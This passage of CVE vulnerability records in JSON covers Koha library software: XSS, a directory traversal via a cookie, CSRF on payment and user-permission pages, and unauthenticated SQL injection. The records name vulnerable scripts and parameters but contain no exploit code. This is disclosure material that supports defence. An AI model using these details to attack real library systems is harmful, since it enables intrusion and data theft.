              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-28740",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-08-21T17:34:03.034235Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-79",
                "description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-08-21T17:34:11.794Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Cross Site Scripting vulnerability in Koha ILS 23.05 and before allows a remote attacker to execute arbitrary code via the additonal-contents.pl component."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-08-06T18:50:03.372423",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "url": "https://febin0x4e4a.wordpress.com/2023/01/11/xss-vulnerability-in-koha-integrated-library-system/"
        },
        {
          "url": "https://febin0x4e4a.wordpress.com/2024/03/07/xss-to-one-click-rce-in-koha-ils/"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2024-28740",
    "datePublished": "2024-08-06T00:00:00",
    "dateReserved": "2024-03-08T00:00:00",
    "dateUpdated": "2024-08-21T17:34:11.794Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2011-4715 (GCVE-0-2011-4715)
Vulnerability from cvelistv5
Published
2011-12-08 19:00
Modified
2024-08-07 00:16
Severity ?
CWE
  • n/a
Summary
Directory traversal vulnerability in cgi-bin/koha/mainpage.pl in Koha 3.4 before 3.4.7 and 3.6 before 3.6.1, and LibLime Koha 4.2 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the KohaOpacLanguage cookie to cgi-bin/opac/opac-main.pl, related to Output.pm.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T00:16:34.139Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "50812",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/50812"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://koha-community.org/koha-3-6-1/#more-2929"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.vigasis.com/en/?guncel_guvenlik=LibLime%20Koha%20%3C=%204.2%20Local%20File%20Inclusion%20Vulnerability\u0026lnk=exploits/18153"
          },
          {
            "name": "18153",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "http://www.exploit-db.com/exploits/18153"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://koha-community.org/koha-3-4-7/#more-2971"
          },
          {
            "name": "77322",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/77322"
          },
          {
            "name": "46980",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/46980"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/liblime/LibLime-Koha/commit/8ea6f7bc37d05a9ec25b5afbea011cf9de5f1e49#C4/Output.pm"
          },
          {
            "name": "liblimekoha-opacmain-file-include(71478)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71478"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2011-11-24T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Directory traversal vulnerability in cgi-bin/koha/mainpage.pl in Koha 3.4 before 3.4.7 and 3.6 before 3.6.1, and LibLime Koha 4.2 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the KohaOpacLanguage cookie to cgi-bin/opac/opac-main.pl, related to Output.pm."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-08-28T12:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "50812",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/50812"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://koha-community.org/koha-3-6-1/#more-2929"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.vigasis.com/en/?guncel_guvenlik=LibLime%20Koha%20%3C=%204.2%20Local%20File%20Inclusion%20Vulnerability\u0026lnk=exploits/18153"
        },
        {
          "name": "18153",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "http://www.exploit-db.com/exploits/18153"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://koha-community.org/koha-3-4-7/#more-2971"
        },
        {
          "name": "77322",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/77322"
        },
        {
          "name": "46980",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/46980"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/liblime/LibLime-Koha/commit/8ea6f7bc37d05a9ec25b5afbea011cf9de5f1e49#C4/Output.pm"
        },
        {
          "name": "liblimekoha-opacmain-file-include(71478)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71478"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2011-4715",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Directory traversal vulnerability in cgi-bin/koha/mainpage.pl in Koha 3.4 before 3.4.7 and 3.6 before 3.6.1, and LibLime Koha 4.2 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the KohaOpacLanguage cookie to cgi-bin/opac/opac-main.pl, related to Output.pm."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "50812",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/50812"
            },
            {
              "name": "http://koha-community.org/koha-3-6-1/#more-2929",
              "refsource": "CONFIRM",
              "url": "http://koha-community.org/koha-3-6-1/#more-2929"
            },
            {
              "name": "http://www.vigasis.com/en/?guncel_guvenlik=LibLime%20Koha%20%3C=%204.2%20Local%20File%20Inclusion%20Vulnerability\u0026lnk=exploits/18153",
              "refsource": "MISC",
              "url": "http://www.vigasis.com/en/?guncel_guvenlik=LibLime%20Koha%20%3C=%204.2%20Local%20File%20Inclusion%20Vulnerability\u0026lnk=exploits/18153"
            },
            {
              "name": "18153",
              "refsource": "EXPLOIT-DB",
              "url": "http://www.exploit-db.com/exploits/18153"
            },
            {
              "name": "http://koha-community.org/koha-3-4-7/#more-2971",
              "refsource": "CONFIRM",
              "url": "http://koha-community.org/koha-3-4-7/#more-2971"
            },
            {
              "name": "77322",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/77322"
            },
            {
              "name": "46980",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/46980"
            },
            {
              "name": "https://github.com/liblime/LibLime-Koha/commit/8ea6f7bc37d05a9ec25b5afbea011cf9de5f1e49#C4/Output.pm",
              "refsource": "CONFIRM",
              "url": "https://github.com/liblime/LibLime-Koha/commit/8ea6f7bc37d05a9ec25b5afbea011cf9de5f1e49#C4/Output.pm"
            },
            {
              "name": "liblimekoha-opacmain-file-include(71478)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71478"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2011-4715",
    "datePublished": "2011-12-08T19:00:00",
    "dateReserved": "2011-12-08T00:00:00",
    "dateUpdated": "2024-08-07T00:16:34.139Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2018-1000669 (GCVE-0-2018-1000669)
Vulnerability from cvelistv5
Published
2018-09-06 19:00
Modified
2024-09-16 23:46
Severity ?
CWE
  • n/a
Summary
KOHA Library System versions 16.11.x (up until 16.11.13) and 17.05.x (up until 17.05.05) contain a Cross-Site Request Forgery (CSRF) vulnerability in /cgi-bin/koha/members/paycollect.pl (affected parameters: borrowernumber, amount, amountoutstanding, paid) that allows attackers to mark payments as paid for certain users on behalf of administrators. Exploitation appears to require that the victim be socially engineered into clicking a link, usually via email. This vulnerability appears to have been fixed in 17.11.
References
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T12:40:47.838Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19117"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "dateAssigned": "2018-09-03T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "KOHA Library System version 16.11.x (up until 16.11.13) and 17.05.x (up until 17.05.05) contains a Cross Site Request Forgery (CSRF) vulnerability in /cgi-bin/koha/members/paycollect.pl Parameters affected: borrowernumber, amount, amountoutstanding, paid that can result in Attackers can mark payments as paid for certain users on behalf of Administrators. This attack appear to be exploitable via The victim must be socially engineered into clicking a link, usually via email. This vulnerability appears to have been fixed in 17.11."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-09-06T19:00:00Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19117"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "DATE_ASSIGNED": "2018-09-03T16:07:16.979484",
          "DATE_REQUESTED": "2018-08-24T17:46:09",
          "ID": "CVE-2018-1000669",
          "REQUESTER": "jiakyooi95@hotmail.com",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "KOHA Library System version 16.11.x (up until 16.11.13) and 17.05.x (up until 17.05.05) contains a Cross Site Request Forgery (CSRF) vulnerability in /cgi-bin/koha/members/paycollect.pl Parameters affected: borrowernumber, amount, amountoutstanding, paid that can result in Attackers can mark payments as paid for certain users on behalf of Administrators. This attack appear to be exploitable via The victim must be socially engineered into clicking a link, usually via email. This vulnerability appears to have been fixed in 17.11."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19117",
              "refsource": "CONFIRM",
              "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19117"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2018-1000669",
    "datePublished": "2018-09-06T19:00:00Z",
    "dateReserved": "2018-09-06T00:00:00Z",
    "dateUpdated": "2024-09-16T23:46:44.626Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2014-1924 (GCVE-0-2014-1924)
Vulnerability from cvelistv5
Published
2020-01-24 16:42
Modified
2024-08-06 09:58
Severity ?
CWE
  • n/a
Summary
The MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 does not require authentication, which allows remote attackers to conduct SQL injection attacks via unspecified vectors.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T09:58:15.560Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://koha-community.org/security-release-february-2014/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-02-07T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 does not require authentication, which allows remote attackers to conduct SQL injection attacks via unspecified vectors."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-01-24T16:42:48",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://koha-community.org/security-release-february-2014/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-1924",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 does not require authentication, which allows remote attackers to conduct SQL injection attacks via unspecified vectors."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://koha-community.org/security-release-february-2014/",
              "refsource": "MISC",
              "url": "http://koha-community.org/security-release-february-2014/"
            },
            {
              "name": "http://www.openwall.com/lists/oss-security/2014/02/07/10",
              "refsource": "MISC",
              "url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
            },
            {
              "name": "http://www.openwall.com/lists/oss-security/2014/02/10/3",
              "refsource": "MISC",
              "url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
            },
            {
              "name": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666",
              "refsource": "MISC",
              "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-1924",
    "datePublished": "2020-01-24T16:42:48",
    "dateReserved": "2014-02-09T00:00:00",
    "dateUpdated": "2024-08-06T09:58:15.560Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2018-1000670 (GCVE-0-2018-1000670)
Vulnerability from cvelistv5
Published
2018-09-06 19:00
Modified
2024-09-16 16:18
Severity ?
CWE
  • n/a
Summary
KOHA Library System version 16.11.x (up until 16.11.13) and 17.05.x (up until 17.05.05) contains a Cross Site Scripting (XSS) vulnerability in multiple fields on multiple pages, including /cgi-bin/koha/acqui/supplier.pl?op=enter, /cgi-bin/koha/circ/circulation.pl?borrowernumber=[number], and /cgi-bin/koha/serials/subscription-add.pl, that can result in privilege escalation by taking control of higher-privileged users' browser sessions. The attack appears to be exploitable when victims are socially engineered into visiting a vulnerable webpage containing a malicious payload. This vulnerability appears to have been fixed in 17.11.
References
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T12:40:47.953Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19086"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "dateAssigned": "2018-09-03T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "KOHA Library System version 16.11.x (up until 16.11.13) and 17.05.x (up until 17.05.05) contains a Cross Site Scripting (XSS) vulnerability in Multiple fields on multiple pages including /cgi-bin/koha/acqui/supplier.pl?op=enter , /cgi-bin/koha/circ/circulation.pl?borrowernumber=[number] , /cgi-bin/koha/serials/subscription-add.pl that can result in Privilege escalation by taking control of higher privileged users browser sessions. This attack appear to be exploitable via Victims must be socially engineered to visit a vulnerable webpage containing malicious payload. This vulnerability appears to have been fixed in 17.11."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-09-06T19:00:00Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19086"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "DATE_ASSIGNED": "2018-09-03T16:07:16.980429",
          "DATE_REQUESTED": "2018-08-24T17:52:47",
          "ID": "CVE-2018-1000670",
          "REQUESTER": "jiakyooi95@hotmail.com",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "KOHA Library System version 16.11.x (up until 16.11.13) and 17.05.x (up until 17.05.05) contains a Cross Site Scripting (XSS) vulnerability in Multiple fields on multiple pages including /cgi-bin/koha/acqui/supplier.pl?op=enter , /cgi-bin/koha/circ/circulation.pl?borrowernumber=[number] , /cgi-bin/koha/serials/subscription-add.pl that can result in Privilege escalation by taking control of higher privileged users browser sessions. This attack appear to be exploitable via Victims must be socially engineered to visit a vulnerable webpage containing malicious payload. This vulnerability appears to have been fixed in 17.11."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19086",
              "refsource": "CONFIRM",
              "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19086"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2018-1000670",
    "datePublished": "2018-09-06T19:00:00Z",
    "dateReserved": "2018-09-06T00:00:00Z",
    "dateUpdated": "2024-09-16T16:18:56.437Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2015-4630 (GCVE-0-2015-4630)
Vulnerability from cvelistv5
Published
2018-10-18 20:00
Modified
2024-08-06 06:18
Severity ?
CWE
  • n/a
Summary
Multiple cross-site request forgery (CSRF) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to (1) hijack the authentication of administrators for requests that create a user via a request to members/memberentry.pl or (2) give a user superlibrarian permission via a request to members/member-flags.pl or (3) hijack the authentication of arbitrary users for requests that conduct cross-site scripting (XSS) attacks via the addshelf parameter to opac-shelves.pl.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T06:18:12.057Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
          },
          {
            "name": "37389",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/37389/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://koha-community.org/security-release-koha-3-16-12/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
          },
          {
            "name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://koha-community.org/security-release-koha-3-18-8/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://koha-community.org/security-release-koha-3-20-1/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://koha-community.org/koha-3-14-16-released/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2015-06-25T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple cross-site request forgery (CSRF) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to (1) hijack the authentication of administrators for requests that create a user via a request to members/memberentry.pl or (2) give a user superlibrarian permission via a request to members/member-flags.pl or (3) hijack the authentication of arbitrary users for requests that conduct cross-site scripting (XSS) attacks via the addshelf parameter to opac-shelves.pl."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-18T19:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
        },
        {
          "name": "37389",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/37389/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://koha-community.org/security-release-koha-3-16-12/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
        },
        {
          "name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://koha-community.org/security-release-koha-3-18-8/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://koha-community.org/security-release-koha-3-20-1/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://koha-community.org/koha-3-14-16-released/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2015-4630",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple cross-site request forgery (CSRF) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to (1) hijack the authentication of administrators for requests that create a user via a request to members/memberentry.pl or (2) give a user superlibrarian permission via a request to members/member-flags.pl or (3) hijack the authentication of arbitrary users for requests that conduct cross-site scripting (XSS) attacks via the addshelf parameter to opac-shelves.pl."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
